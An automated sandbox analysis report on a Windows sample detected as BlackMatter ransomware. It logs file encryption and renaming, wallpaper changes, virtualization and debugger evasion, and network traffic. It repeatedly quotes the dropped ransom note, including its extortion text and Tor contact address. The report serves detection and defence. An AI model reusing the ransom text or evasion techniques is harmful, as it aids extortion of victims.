          Source: global trafficHTTP traffic detected: GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: Chrome/91.0.4472.77Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: global trafficHTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1821-5994-88c3-3f09ef5a5c59 HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: AppleWebKit/587.38 (KHTML, like Gecko)Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: global trafficHTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1822-00f0-90ca-3541d116f917 HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: AppleWebKit/587.38 (KHTML, like Gecko)Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: unknownHTTPS traffic detected: 103.224.212.222:443 -> 192.168.2.3:49755 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands:

          barindex
          Found ransom note / readmeShow sources
          Source: C:\Users\user\Videos\kVuoJyeoW.README.txtDropped file: ~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' .>>> What happens? Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.>>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises.>> Data leak includes1. Full emloyeers personal data2. Network information3. Schemes of buildings, active project information, architect details and contracts, 4. Finance info>>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.Jump to dropped file
          Yara detected BLACKMatter RansomwareShow sources
          Source: Yara matchFile source: 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GlLHM7paoZ.exe PID: 4540, type: MEMORYSTR
          Changes the wallpaper pictureShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Desktop WallPaper C:\ProgramData\kVuoJyeoW.bmpJump to behavior
          Modifies existing user documents (likely ransomware behavior)Show sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.xlsxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpgJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\EWZCVGNOWT.pngJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
          Writes a notice file (html or txt) to demand a ransomShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Videos\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Saved Games\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Searches\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Contacts\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: GlLHM7paoZ.exe, type: SAMPLEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: GlLHM7paoZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: GlLHM7paoZ.exe, type: SAMPLEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F51E80_2_010F51E8
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F207C0_2_010F207C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F4CD80_2_010F4CD8
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F4CD30_2_010F4CD3
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F890B CreateThread,ResumeThread,GetExitCodeThread,NtClose,0_2_010F890B
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9F23 RegCreateKeyExW,RegQueryValueExW,NtClose,0_2_010F9F23
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7F4C NtClose,0_2_010F7F4C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9554 NtSetInformationProcess,NtSetInformationProcess,0_2_010F9554
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8766 NtSetInformationThread,0_2_010F8766
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6393 NtQueryInformationToken,0_2_010F6393
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010FB790 CreateThread,NtClose,0_2_010FB790
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F73C1 NtQuerySystemInformation,0_2_010F73C1
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6245 RegCreateKeyExW,RegQueryValueExW,NtClose,0_2_010F6245
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9494 NtQueryInformationToken,0_2_010F9494
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EA7 NtQuerySystemInformation,0_2_010F7EA7
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F92E1 NtSetInformationThread,0_2_010F92E1
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F73F3 NtQuerySystemInformation,0_2_010F73F3
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F740C NtQuerySystemInformation,0_2_010F740C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EE0 NtQuerySystemInformation,0_2_010F7EE0
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EF9 NtQuerySystemInformation,0_2_010F7EF9
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8DC6: FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl,0_2_010F8DC6
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeProcess token adjusted: SecurityJump to behavior
          Source: GlLHM7paoZ.exeStatic PE information: Section: .rsrc ZLIB complexity 0.990792410714
          Source: GlLHM7paoZ.exeVirustotal: Detection: 86%
          Source: GlLHM7paoZ.exeMetadefender: Detection: 77%
          Source: GlLHM7paoZ.exeReversingLabs: Detection: 92%
          Source: GlLHM7paoZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\kVuoJyeoW.README.txtJump to behavior
          Source: classification engineClassification label: mal100.rans.evad.winEXE@1/176@6/2
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8C6E GetDiskFreeSpaceExW,0_2_010F8C6E
          Source: GlLHM7paoZ.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\d2c777569925c4c22958338e72708f92
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: GlLHM7paoZ.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GlLHM7paoZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F353B push 0000006Ah; retf 0_2_010F3614
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F35A5 push 0000006Ah; retf 0_2_010F3614
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F35A3 push 0000006Ah; retf 0_2_010F3614
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F57A7 LoadLibraryA,GetProcAddress,0_2_010F57A7
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Videos\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Searches\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Saved Games\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Recent\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Pictures\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Pictures\Camera Roll\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\OneDrive\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Music\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Links\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Favorites\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Favorites\Links\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Downloads\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\ZQIXMVQGAH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\QNCYCDFIJJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\QCFWYSKMHA\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\NWCXBPIUYI\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\LFOPODGVOH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\JDDHMPCDUJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\BNAGMGSPLO\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\QNCYCDFIJJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\PIVFAGEAAV\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\NWCXBPIUYI\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\LFOPODGVOH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\JDDHMPCDUJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\GIGIYTFFYT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\GAOBCVIQIJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\DUUDTUBZFW\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Contacts\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\3D Objects\kVuoJyeoW.README.txtJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F1014 0_2_010F1014
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F1014 rdtsc 0_2_010F1014
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F5928 FindFirstFileW,LoadLibraryW,FindNextFileW,FindClose,0_2_010F5928
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010FBF33 GetFileAttributesW,SetThreadPriority,FindFirstFileExW,FindNextFileW,FindClose,0_2_010FBF33
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6BBF FindFirstFileExW,GetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,0_2_010F6BBF
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6A11 FindFirstFileExW,FindNextFileW,0_2_010F6A11
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6AE4 FindFirstFileExW,FindClose,0_2_010F6AE4
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8BB4 GetLogicalDriveStringsW,0_2_010F8BB4
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW* 7-WFP Native MAC Layer LightWeight Filter-0000

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
